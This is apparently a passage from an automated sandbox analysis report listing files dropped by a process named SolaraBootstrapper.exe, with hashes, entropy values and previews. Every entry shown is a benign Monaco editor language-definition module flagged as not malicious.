                                                  SHA-256:8EB1690C57D0F458D66E89A57E2ABA95E6375EE9FEF3E7AB5ECA9FFA0B3EAB7D
                                                  SHA-512:32B51088DC171F4255C4EA44AE9A9BB67628ED37437E848106420C35501066F1E3EA8AF8295A3F949959D565D7388744E35BD76530621E1A0591A4BEDC8DB46F
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/flow9/flow9", ["require","require"],(require)=>{.var moduleExports=(()=>{var s=Object.defineProperty;var r=Object.getOwnPropertyDescriptor;var a=Object.getOwnPropertyNames;var l=Object.prototype.hasOwnProperty;var c=(o,e)=>{for(var t in e)s(o,t,{get:e[t],enumerable:!0})},m=(o,e,t,i)=>{if(e&&typeof e=="object"||typeof e=="function")for(let n of a(e))!l.call(o,n)&&n!==t&&s(o,n,{get:()=>e[n],enumerable:!(i=r(e,n))||i.enumerable});return o};var p=o=>m(s({},"__esModule",{value:!0}),o);var u={};c(u,{conf:()=>g,language:()=>f});var g={comments:{blockComment:["/*","*/"],line
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (13644)
                                                  Category:dropped
                                                  Size (bytes):17189
                                                  Entropy (8bit):5.52256186558295
                                                  Encrypted:false
                                                  SSDEEP:192:G9YRwoBu4Tu4MhBDPfFSNki1bfqpi+R/MFxHaMRhoeStMvcqgjj0y0+gblJvsqjd:Ggu4Tu4MnfFuki5fsi+OLHu5usqjd
                                                  MD5:7D11611975C17C851783E146DDAA9085
                                                  SHA1:C63D19E6599D7CCCA45C89DB1B71B76B6EA9E67B
                                                  SHA-256:454CE0EB30379A348562CBD10B361EA37DCD787E144F9EABB05F977A01C1996F
                                                  SHA-512:F11622EEF9042B5B151C10F765F1DD0DD212D429B8073F25CBFB23C6B2D297ECC489BD55AC5784735447F4DA75FEDD83343D49DDC31726DCE4F42B519785394D
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/freemarker2/freemarker2", ["require","require"],(require)=>{.var moduleExports=(()=>{var B=Object.create;var d=Object.defineProperty;var C=Object.getOwnPropertyDescriptor;var D=Object.getOwnPropertyNames;var T=Object.getPrototypeOf,v=Object.prototype.hasOwnProperty;var w=(t=>typeof require!="undefined"?require:typeof Proxy!="undefined"?new Proxy(t,{get:(n,i)=>(typeof require!="undefined"?require:n)[i]}):t)(function(t){if(typeof require!="undefined")return require.apply(this,arguments);throw new Error('Dynamic require of "'+t+'" is not supported')});var h=(t,n)=>()=>(
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (3305)
                                                  Category:dropped
                                                  Size (bytes):3810
                                                  Entropy (8bit):5.293056647445291
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRssQ+/ErryV1+IV1+/P6dL4a5Ag7xwGGBdFXhM:G9YZurOjYcsgFaRM
                                                  MD5:00B4EF63492498C77FE94756722C677E
                                                  SHA1:CB23E1FA4567E7F5E02C13FE52FDBDCF766B97C2
                                                  SHA-256:2E6B617140B6D195F890488759776DA4071506F27AC5719C1EE2F8EC5FFD0EE5
                                                  SHA-512:044BD6B2FD88F075D68166881DB86C90D9B35D74ED646BB50927D7B0A8F0820EEA9009490BABD683832EFC44AF9F917B8DCAD2CB0602E43DE7EED8077C170862
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/fsharp/fsharp", ["require","require"],(require)=>{.var moduleExports=(()=>{var s=Object.defineProperty;var r=Object.getOwnPropertyDescriptor;var a=Object.getOwnPropertyNames;var l=Object.prototype.hasOwnProperty;var c=(n,e)=>{for(var o in e)s(n,o,{get:e[o],enumerable:!0})},g=(n,e,o,i)=>{if(e&&typeof e=="object"||typeof e=="function")for(let t of a(e))!l.call(n,t)&&t!==o&&s(n,t,{get:()=>e[t],enumerable:!(i=r(e,t))||i.enumerable});return n};var f=n=>g(s({},"__esModule",{value:!0}),n);var d={};c(d,{conf:()=>m,language:()=>u});var m={comments:{lineComment:"//",blockComme
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (2979)
                                                  Category:dropped
                                                  Size (bytes):3476
                                                  Entropy (8bit):5.3108132560576715
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRs9+/EnarbV1+OK6V1+j/X6LKMAnuLfb6j79wGcmDRBmM:G9YuarT/NQuqpiUz
                                                  MD5:AE78759C0ACCDC96A28A982AFCEDCBFB
                                                  SHA1:0CC65DE836EF180B910B547619E708FC763F8412
                                                  SHA-256:EA2D2E46F02FAF4D44B95E07713F5784588A4223C218F75C12820EDA16EB1B27
                                                  SHA-512:60EF93A60B1A202C894F9C7A5F692761C03758EF62149D363327992E2E15BC925DE858E68D609DBB895DE72617EC04F9EA7AF14F4BDF6B03F9C75C0EC47FF98B
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/go/go", ["require","require"],(require)=>{.var moduleExports=(()=>{var s=Object.defineProperty;var i=Object.getOwnPropertyDescriptor;var a=Object.getOwnPropertyNames;var c=Object.prototype.hasOwnProperty;var m=(n,e)=>{for(var t in e)s(n,t,{get:e[t],enumerable:!0})},l=(n,e,t,r)=>{if(e&&typeof e=="object"||typeof e=="function")for(let o of a(e))!c.call(n,o)&&o!==t&&s(n,o,{get:()=>e[o],enumerable:!(r=i(e,o))||r.enumerable});return n};var g=n=>l(s({},"__esModule",{value:!0}),n);var d={};m(d,{conf:()=>p,language:()=>u});var p={comments:{lineComment:"//",blockComment:["/*"
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (2582)
                                                  Category:dropped
                                                  Size (bytes):3089
                                                  Entropy (8bit):5.523286773949331
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRs3e+/EJsmV1+0qGV1+XI7fojagGn8p:G9YuNiRfLy
                                                  MD5:7286A9AE1920C07990495E4C7E5F7E91
                                                  SHA1:16CE86B2082EDF389B67B01A7E31CDE2F2576C42
                                                  SHA-256:C937A21620654373DA4D87B9E2F20CBCA1C02906D05F53DDE5E41FE737DEE930
                                                  SHA-512:A99EA0E80FF4A5870733DD10407882A526DA0CE93A68CAED4C33AE17E75A290224138A209F2CE1B587D2F2B771D0FA4D829B2CE8BC76F0DC8355E1FAE3B06A05
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/graphql/graphql", ["require","require"],(require)=>{.var moduleExports=(()=>{var s=Object.defineProperty;var a=Object.getOwnPropertyDescriptor;var i=Object.getOwnPropertyNames;var l=Object.prototype.hasOwnProperty;var c=(n,e)=>{for(var t in e)s(n,t,{get:e[t],enumerable:!0})},d=(n,e,t,r)=>{if(e&&typeof e=="object"||typeof e=="function")for(let o of i(e))!l.call(n,o)&&o!==t&&s(n,o,{get:()=>e[o],enumerable:!(r=a(e,o))||r.enumerable});return n};var p=n=>d(s({},"__esModule",{value:!0}),n);var u={};c(u,{conf:()=>g,language:()=>I});var g={comments:{lineComment:"#"},brackets
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:exported SGML document, ASCII text, with very long lines (7354)
                                                  Category:dropped
                                                  Size (bytes):7867
                                                  Entropy (8bit):5.363674212110662
                                                  Encrypted:false
                                                  SSDEEP:192:G9Y1JAtC+U+nBQld2BZ1x0p4OE60+dMZLDJ:GeJAtCHyxePlb2DJ
                                                  MD5:970D86FA036850C5BC3B92FAED3CC392
                                                  SHA1:DBDC65D05EEA7B95A3599875E8D71FEA0A80F264
                                                  SHA-256:E17FF28CFDA2D8306C9E74394D67329A6FA98D696AF08F66B9E7B42E87971CC0
                                                  SHA-512:8457F6DE555AE295CC918A55D469978D47D5D96B33B726F2C71A3DA71EE1B11E89AA40A1F433269667424D9DE3CD368699D9BE56B489AFCC372E772E26604ACA
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/handlebars/handlebars", ["require","require"],(require)=>{.var moduleExports=(()=>{var h=Object.create;var i=Object.defineProperty;var b=Object.getOwnPropertyDescriptor;var u=Object.getOwnPropertyNames;var x=Object.getPrototypeOf,k=Object.prototype.hasOwnProperty;var y=(e=>typeof require!="undefined"?require:typeof Proxy!="undefined"?new Proxy(e,{get:(t,n)=>(typeof require!="undefined"?require:t)[n]}):e)(function(e){if(typeof require!="undefined")return require.apply(this,arguments);throw new Error('Dynamic require of "'+e+'" is not supported')});var T=(e,t)=>()=>(t|
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (3912)
                                                  Category:dropped
                                                  Size (bytes):4411
                                                  Entropy (8bit):5.371544690251042
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRsU+/ErLoQV1+VV1+eOGo15nb6IMn8BqTgMZiGfACnlawG8J2LHEFkQ:G9YVLo4c6GupM8MzYCnlaTjc
                                                  MD5:557F27EDE3950BCAC0EE6931E40D4D60
                                                  SHA1:5C8A59C010E7592603F99C7B72E32AB093FFA802
                                                  SHA-256:20E7B4AE616A398D20BF97A25F773DF9D4D56C5008717BE2F29C21A37F4BDB2B
                                                  SHA-512:B5ACC9FFE6F6795C2F0D8DFBF87DC7DF6601AB96C61B16736B44A6820041204DDAE6ADCA65361CFD2F41789D05A26AD9DB4BC64B0D9365A6AF8F50EAABCE6529
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/hcl/hcl", ["require","require"],(require)=>{.var moduleExports=(()=>{var r=Object.defineProperty;var a=Object.getOwnPropertyDescriptor;var i=Object.getOwnPropertyNames;var c=Object.prototype.hasOwnProperty;var l=(t,e)=>{for(var o in e)r(t,o,{get:e[o],enumerable:!0})},d=(t,e,o,n)=>{if(e&&typeof e=="object"||typeof e=="function")for(let s of i(e))!c.call(t,s)&&s!==o&&r(t,s,{get:()=>e[s],enumerable:!(n=a(e,s))||n.enumerable});return t};var m=t=>d(r({},"__esModule",{value:!0}),t);var f={};l(f,{conf:()=>p,language:()=>g});var p={comments:{lineComment:"#",blockComment:["/*
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:exported SGML document, ASCII text, with very long lines (5594)
                                                  Category:dropped
                                                  Size (bytes):6095
                                                  Entropy (8bit):5.390237052992852
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRsEBlGV//sgwYI3vV1+/6mQVV1+7BXBGl0GSytHd6EHaK4T6ETYmYS6EA:G9YXAin3n+4Qlgl0GSytHLaK45P8cKMg
                                                  MD5:A0839B694D3BE2826C7AD706B9F7C105
                                                  SHA1:306CAC34E9CEA93B9F0934A605D066C64E634D1B
                                                  SHA-256:2213B2419FEFEC449189CCD7ADA6E444FC0AE9325F53D77F27BE916DD82ED522
                                                  SHA-512:71C7F104576F2B495CF8CCEE129A44131C6D20F8E97AFC48EE942CC5507A6731BDD86FB4D04BA5736F54EA321F06F8D6BB37F14C80F7B25C58441332396FD6A3
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/html/html", ["require","require"],(require)=>{.var moduleExports=(()=>{var u=Object.create;var a=Object.defineProperty;var b=Object.getOwnPropertyDescriptor;var x=Object.getOwnPropertyNames;var y=Object.getPrototypeOf,g=Object.prototype.hasOwnProperty;var k=(e=>typeof require!="undefined"?require:typeof Proxy!="undefined"?new Proxy(e,{get:(t,n)=>(typeof require!="undefined"?require:t)[n]}):e)(function(e){if(typeof require!="undefined")return require.apply(this,arguments);throw new Error('Dynamic require of "'+e+'" is not supported')});var E=(e,t)=>()=>(t||e((t={expor
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (1423)
                                                  Category:dropped
                                                  Size (bytes):1922
                                                  Entropy (8bit):5.394736650402756
                                                  Encrypted:false
                                                  SSDEEP:48:pQFDHn43tZRsF6tk+/EAy6+eu0V1+/n0V1+/AB60K:pQFDHnYRsF6tk+/ERbmV1+/0V1+/Ag3
                                                  MD5:3FE8B523BBEB47087B0CEB9B89F94F69
                                                  SHA1:64798C8CA02212ADA0346D07C27E678439633055
                                                  SHA-256:3D888E02D0B0CED0EE1464E307D7689653ECE70553C17BC4F0325C436F033E9B
                                                  SHA-512:AB476CE5F0FD19E87137E33BFBAEC06517B0BD039223FB7D4F619D2702A587BC59CE646252B8C43DF5E34561E08ED5B493119946F8EAB51CADB11C7CC18F410A
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/ini/ini", ["require","require"],(require)=>{.var moduleExports=(()=>{var t=Object.defineProperty;var i=Object.getOwnPropertyDescriptor;var r=Object.getOwnPropertyNames;var g=Object.prototype.hasOwnProperty;var c=(n,e)=>{for(var s in e)t(n,s,{get:e[s],enumerable:!0})},l=(n,e,s,a)=>{if(e&&typeof e=="object"||typeof e=="function")for(let o of r(e))!g.call(n,o)&&o!==s&&t(n,o,{get:()=>e[o],enumerable:!(a=i(e,o))||a.enumerable});return n};var p=n=>l(t({},"__esModule",{value:!0}),n);var f={};c(f,{conf:()=>u,language:()=>m});var u={comments:{lineComment:"#"},brackets:[["{","
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (3543)
                                                  Category:dropped
                                                  Size (bytes):4044
                                                  Entropy (8bit):5.362534459264137
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRsO+/EYx+rbV1+/0V1+/mQqZ4SgLhb67g71wGcaRW8P:G9Y6+rTx1SSgLBZiaf
                                                  MD5:96443484AA667722DB07542BD0DC6F81
                                                  SHA1:C9F5F02401A2370BB52A784A1C4470A7F0F413F6
                                                  SHA-256:EE57D3885B119A5585180CAA2C26498BF6E6640B10481DC9677B7610198C4E2E
                                                  SHA-512:46F69516C4254CF50B26A3E7C92BE4288AF83ED25EE9A5B7649502CD916BC8069AE8C4C04EDE54D1BFC5599807E817F5726C78AC65EDEA5EA5D7A61C52DA8221
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/java/java", ["require","require"],(require)=>{.var moduleExports=(()=>{var s=Object.defineProperty;var a=Object.getOwnPropertyDescriptor;var r=Object.getOwnPropertyNames;var c=Object.prototype.hasOwnProperty;var l=(t,e)=>{for(var o in e)s(t,o,{get:e[o],enumerable:!0})},d=(t,e,o,i)=>{if(e&&typeof e=="object"||typeof e=="function")for(let n of r(e))!c.call(t,n)&&n!==o&&s(t,n,{get:()=>e[n],enumerable:!(i=a(e,n))||i.enumerable});return t};var g=t=>d(s({},"__esModule",{value:!0}),t);var f={};l(f,{conf:()=>m,language:()=>p});var m={wordPattern:/(-?\d*\.\d\w*)|([^\`\~\!\#\%
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (6664)
                                                  Category:dropped
                                                  Size (bytes):7177
                                                  Entropy (8bit):5.340697066386712
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRsv6V//wZM4hFnx+rzmEmSLV1+KgqIqRnytBGMBb6IoxxwpcaxuSWlYTZ:G9Y/shb+rSBy10SdFSWl4eY1LV
                                                  MD5:C28332134B3A1E3A81621E08888D1C23
                                                  SHA1:0A79894F59E8224E1FFD4C1431ED6306CCAAE5A5
                                                  SHA-256:E7276C9E1382AEBB07C75F6F62D52F7DF17DDB06ECED55CBF2B6F0BE6B22B113
                                                  SHA-512:04A7A563381896C8B044690C9675DE87AA1377BAACB43E7EBC36853B66AF35F2F9156E33237FD16990E8B0FFD6F40961A7C97D47B3F404C78BD22EFDAEA6FF93
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/javascript/javascript", ["require","require"],(require)=>{.var moduleExports=(()=>{var x=Object.create;var a=Object.defineProperty;var u=Object.getOwnPropertyDescriptor;var f=Object.getOwnPropertyNames;var b=Object.getPrototypeOf,k=Object.prototype.hasOwnProperty;var y=(e=>typeof require!="undefined"?require:typeof Proxy!="undefined"?new Proxy(e,{get:(t,n)=>(typeof require!="undefined"?require:t)[n]}):e)(function(e){if(typeof require!="undefined")return require.apply(this,arguments);throw new Error('Dynamic require of "'+e+'" is not supported')});var w=(e,t)=>()=>(t|
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (7546)
                                                  Category:dropped
                                                  Size (bytes):8052
                                                  Entropy (8bit):5.342203477681667
                                                  Encrypted:false
                                                  SSDEEP:192:G9Y0ooxSTTPkomoXGZ8OBcgbmUkZYugpp9:GFxu1GZ8Oqgbhkw5
                                                  MD5:B0ABF2D2AEDA11C1C55188E8937348BB
                                                  SHA1:64F42B91D855145954572DA2870337FE549DF86D
                                                  SHA-256:763D2D709CC767AEBB86D7F47E094A2FF0EC6C2FF20DB746087DA25F5793CF1B
                                                  SHA-512:0C4DDF9BE69E98B430E06501F435FF3DB7AE13CC7BDA69A4F5A5AF888635B78BAC82F3D5D85058496689B88BE78EC5E2042E865B8B18309B3EBD488376FEF04C
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/julia/julia", ["require","require"],(require)=>{.var moduleExports=(()=>{var o=Object.defineProperty;var i=Object.getOwnPropertyDescriptor;var s=Object.getOwnPropertyNames;var p=Object.prototype.hasOwnProperty;var c=(t,e)=>{for(var n in e)o(t,n,{get:e[n],enumerable:!0})},l=(t,e,n,a)=>{if(e&&typeof e=="object"||typeof e=="function")for(let r of s(e))!p.call(t,r)&&r!==n&&o(t,r,{get:()=>e[r],enumerable:!(a=i(e,r))||a.enumerable});return t};var d=t=>l(o({},"__esModule",{value:!0}),t);var u={};c(u,{conf:()=>g,language:()=>m});var g={brackets:[["{","}"],["[","]"],["(",")"]
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (3761)
                                                  Category:dropped
                                                  Size (bytes):4266
                                                  Entropy (8bit):5.3176292410340915
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRsY+/Ewx+rbV1+/0V1+/mQfbKg2fOjb6wg71wGcaRD8P:G9Yo+rTx1ke3ZiaI
                                                  MD5:3B3DF48820FA9BABB28073503DE74C42
                                                  SHA1:9B979531E998FE5F4EC23732F586D08ADFB66F7B
                                                  SHA-256:E4820FCF63E4C464499AAB40FF948027987E1484A045A91741BBA480FC71D687
                                                  SHA-512:B4F8635360CD8CAA8BF8ECE159EAFC5E9A49CB69FE4B51778EBA4FD1302195512C28123FC7A77D29E47026CE4E6BFAD68AA11160B17C8E6847EEDA1BCADF232E
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/kotlin/kotlin", ["require","require"],(require)=>{.var moduleExports=(()=>{var o=Object.defineProperty;var a=Object.getOwnPropertyDescriptor;var r=Object.getOwnPropertyNames;var c=Object.prototype.hasOwnProperty;var l=(n,e)=>{for(var i in e)o(n,i,{get:e[i],enumerable:!0})},d=(n,e,i,s)=>{if(e&&typeof e=="object"||typeof e=="function")for(let t of r(e))!c.call(n,t)&&t!==i&&o(n,t,{get:()=>e[t],enumerable:!(s=a(e,t))||s.enumerable});return n};var g=n=>d(o({},"__esModule",{value:!0}),n);var f={};l(f,{conf:()=>m,language:()=>p});var m={wordPattern:/(-?\d*\.\d\w*)|([^\`\~\!
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (2868)
                                                  Category:dropped
                                                  Size (bytes):4721
                                                  Entropy (8bit):5.346231459881856
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRsZIK+/E86rMq+q17qcq6V1+/e+ufj1cCzBbu/2nOgemmEuluHrraW4NR:G9Y0a6rr9auhlzBbu4OYDugqW4NUk
                                                  MD5:ECCC0FDAF625D47363B445C514F7FFB1
                                                  SHA1:EA58AA904E360B169978E16FED52596E71C5A25F
                                                  SHA-256:291122062F89179DB9A9495490FA112AEB003B04CD68E51F34722E79FEC05188
                                                  SHA-512:B271C0D4D8E0EA8A4CBDCBE3C4CB62B1F790FC184573E569A9B6D17E43BE2913E1DB88BBBDC3FFD9ACEC3AFA3BEC18BAEED7EC7B72CD63AD76E5F2BC8BA31959
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/less/less", ["require","require"],(require)=>{.var moduleExports=(()=>{var r=Object.defineProperty;var s=Object.getOwnPropertyDescriptor;var a=Object.getOwnPropertyNames;var l=Object.prototype.hasOwnProperty;var d=(t,e)=>{for(var i in e)r(t,i,{get:e[i],enumerable:!0})},u=(t,e,i,o)=>{if(e&&typeof e=="object"||typeof e=="function")for(let n of a(e))!l.call(t,n)&&n!==i&&r(t,n,{get:()=>e[n],enumerable:!(o=s(e,n))||o.enumerable});return t};var c=t=>u(r({},"__esModule",{value:!0}),t);var p={};d(p,{conf:()=>m,language:()=>g});var m={wordPattern:/(#?-?\d*\.\d\w*%?)|([@#!.:]?
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (2759)
                                                  Category:dropped
                                                  Size (bytes):3262
                                                  Entropy (8bit):5.308125335507135
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRs/P+/EXB6V1+/UV1+j/mQ4pEbOTX51wGKd3/r:G9YYfBm537FXfod3T
                                                  MD5:6002B31F497EBA52A0C2A42A948ABCEF
                                                  SHA1:32EFEE628A1AE1501D036242F7CDBF6525D2DFAA
                                                  SHA-256:D55482FD3FFCCD1F243C9335DBC10504E0896EA0B27B9E5DB8BD129C1AAD8DD2
                                                  SHA-512:A1732606345689706D7391646600801ABA0BA00E0E8DD10B1AAD06778860AC2769D1E8E14CF2F928AA5BE577C63243CDAF09A12DCE6EB105189D68F99DCB52C5
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/lexon/lexon", ["require","require"],(require)=>{.var moduleExports=(()=>{var n=Object.defineProperty;var s=Object.getOwnPropertyDescriptor;var d=Object.getOwnPropertyNames;var a=Object.prototype.hasOwnProperty;var l=(t,e)=>{for(var i in e)n(t,i,{get:e[i],enumerable:!0})},p=(t,e,i,r)=>{if(e&&typeof e=="object"||typeof e=="function")for(let o of d(e))!a.call(t,o)&&o!==i&&n(t,o,{get:()=>e[o],enumerable:!(r=s(e,o))||r.enumerable});return t};var c=t=>p(n({},"__esModule",{value:!0}),t);var k={};l(k,{conf:()=>m,language:()=>u});var m={comments:{lineComment:"COMMENT"},bracke
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:exported SGML document, ASCII text, with very long lines (4540)
                                                  Category:dropped
                                                  Size (bytes):5045
                                                  Entropy (8bit):5.356467049943116
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRsVV//zFqF/V1+/I/MBTBEyXXdzAJSJJlW7a+AApDp:G9YoGS5myXX6Ajl4a+AAn
                                                  MD5:03FF655521479E1B4E576776C5FF9D6A
                                                  SHA1:463159A64BEED5648C995126FB2A892F020FFF9A
                                                  SHA-256:CA01C2B1A36AB94E30542F3B936798B3B8D51C2BFC88789E416C26529E91D785
                                                  SHA-512:B4B207FD48634378B0DECB9BF4708BC510653FA018A1F68DF167D917F7BDFDD3ED61E9F58712BC8E22E6FCCC12F17EABF54BEA36E7470A01FAD3B2912DE969DC
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/liquid/liquid", ["require","require"],(require)=>{.var moduleExports=(()=>{var p=Object.create;var a=Object.defineProperty;var g=Object.getOwnPropertyDescriptor;var w=Object.getOwnPropertyNames;var h=Object.getPrototypeOf,q=Object.prototype.hasOwnProperty;var f=(e=>typeof require!="undefined"?require:typeof Proxy!="undefined"?new Proxy(e,{get:(t,i)=>(typeof require!="undefined"?require:t)[i]}):e)(function(e){if(typeof require!="undefined")return require.apply(this,arguments);throw new Error('Dynamic require of "'+e+'" is not supported')});var b=(e,t)=>()=>(t||e((t={e
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (2445)
                                                  Category:dropped
                                                  Size (bytes):2944
                                                  Entropy (8bit):5.347423005039242
                                                  Encrypted:false
                                                  SSDEEP:48:pQFDHn43tZRs4l+/EYHgUCl0V1+/n0V1+/OFdI/1cFswqb6jxFv7cuVfl20F:pQFDHnYRso+/EHUC6V1+/0V1+/6dIeM4
                                                  MD5:82922FFBE64017A02786A0943E8382A3
                                                  SHA1:1AC1BCAD8D21045F3208826D1F18E4350B0AE019
                                                  SHA-256:4475C0F4D02C2C6145B097B80CC7E4C3AF9246639D20869FF394FE70926CD942
                                                  SHA-512:EBC38A944D3846B2FEF5BBE8325506DDDBDFD3AF8CE705873A1A711C8C7C38C62FB7CB9EB7D99B856510A3274A5A9CB1609E53D3787F07277618A3A897969F00
                                                  Malicious:false
